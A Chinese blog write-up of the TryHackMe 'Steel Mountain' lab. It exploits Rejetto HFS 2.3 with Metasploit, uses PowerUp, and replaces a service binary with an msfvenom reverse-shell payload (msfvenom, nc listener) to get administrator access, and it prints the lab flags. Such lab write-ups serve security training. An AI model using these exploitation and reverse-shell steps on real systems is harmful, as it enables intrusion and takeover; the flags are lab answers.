TryHackMe-Steel Mountain练习

本文相关的TryHackMe实验房间链接:TryHackMe | Why Subscribe

我们先访问一下网站

 我们看一下源代码

答题:

接下来我们先简单端口扫描一下

nmap 10.10.48.4

除了默认的80端口之外,目标站点还开放了8080端口提供http服务

我们先搜索一下HttpFileServer httpd 2.3

接下来我们使用Metasploit

msfconsole

search Rejetto HTTP File Server

use 0

options

set RHOSTS 10.10.48.4
set RPORT 8080
run(或exploit)

 接下来我们键入 shell 以获取交互式 shell 

cd /Users/bill/Desktop
dir

type user.txt

flag:b04763b6fcf51fcd7c13abc7db4fd365 

答题:

为了枚举这台机器,我们将使用一个名为 PowerUp 的 powershell 脚本,其目的是评估 Windows 机器并确定任何异常情况 - “PowerUp 旨在成为依赖于错误配置的常见 Windows 权限提升向量的交流中心

下载脚本(注意不要使用命令行的形式下载这个脚本,而是复制脚本内容并新建一个ps1文件):

raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1

一旦脚本保存在本地,就可以通过 meterpreter shell 上传该脚本:

或者

wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1

load powershell
powershell_shell
. .\Powerup.ps1
Invoke-AllChecks

打开新的终端 

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.212.239 LPORT=1234 -e x86/shikata_ga_nai -f exe -o ASCService.exe

upload ASCService.exe
shell

进入普通的windows shell界面,我们先停止合法的服务运行,然后用恶意的二进制程序替换正常的同名应用程序文件: 

sc stop AdvancedSystemCareService9
copy ASCService.exe "\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"

在重新启动服务之前,我们需要在攻击机终端中设置一个netcat侦听器:

nc -lvnp 1234

 然后我们可以在 windows shell 中重新启动之前停止的服务:

一旦之前的服务重新启动,攻击机上的侦听器中将获取到反向 shell。成功获取管理员权限之后,我们可以切换到 Administrator 的 Desktop 目录查看root.txt 文件:

cd C:\Users\Administrator\Desktop
dir
type root.txt

flag: 9af5f314f57607c00fd09803a587db80

答题:

接下来我们不使用Metasploit获取初始访问权限并提权

注意:此处建议重启目标机。

首先,我们将使用相同的 CVE。但是,这次让我们使用这个Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2) - Windows remote Exploit (exploit-db.com)

为了使这种攻击起作用,需要同时激活Web服务器和netcat侦听器,如果你的系统上还没有 netcat 静态二进制文件,那么你可以从GitHub下载。我们还将使用 winPEAS来枚举目标机系统信息。 

netcat二进制文件:https://github.com/andrew-d/static-binaries/blob/master/binaries/windows/x86/ncat.exe

winPEAS(在下载页选择winPEASx64.exe):https://github.com/carlospolop/PEASS-ng/releases/tag/20221009

或者

下载netcat

wget https://github.com/andrew-d/static-binaries/blob/0be803093b7d4b627b4d4eddd732e54ac4184b67/binaries/windows/x86/ncat.exe

下载完 ncat.exe 文件并将其重命名为 nc.exe 

 下载 WinPease

wget https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/a17f91745cafc5fa43a428d766294190c0ff70a1/winPEAS/winPEASexe/binaries/x86/Release/winPEASx86.exe

别忘修改39161中的ip和端口 

 后面不知道为什么复现不了,我还是太菜了。。。。。

这里就不在演示了

参考文章【THM】Steel Mountain-练习 - Hekeatsll - 博客园 (cnblogs.com)

答题:

  • 19
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值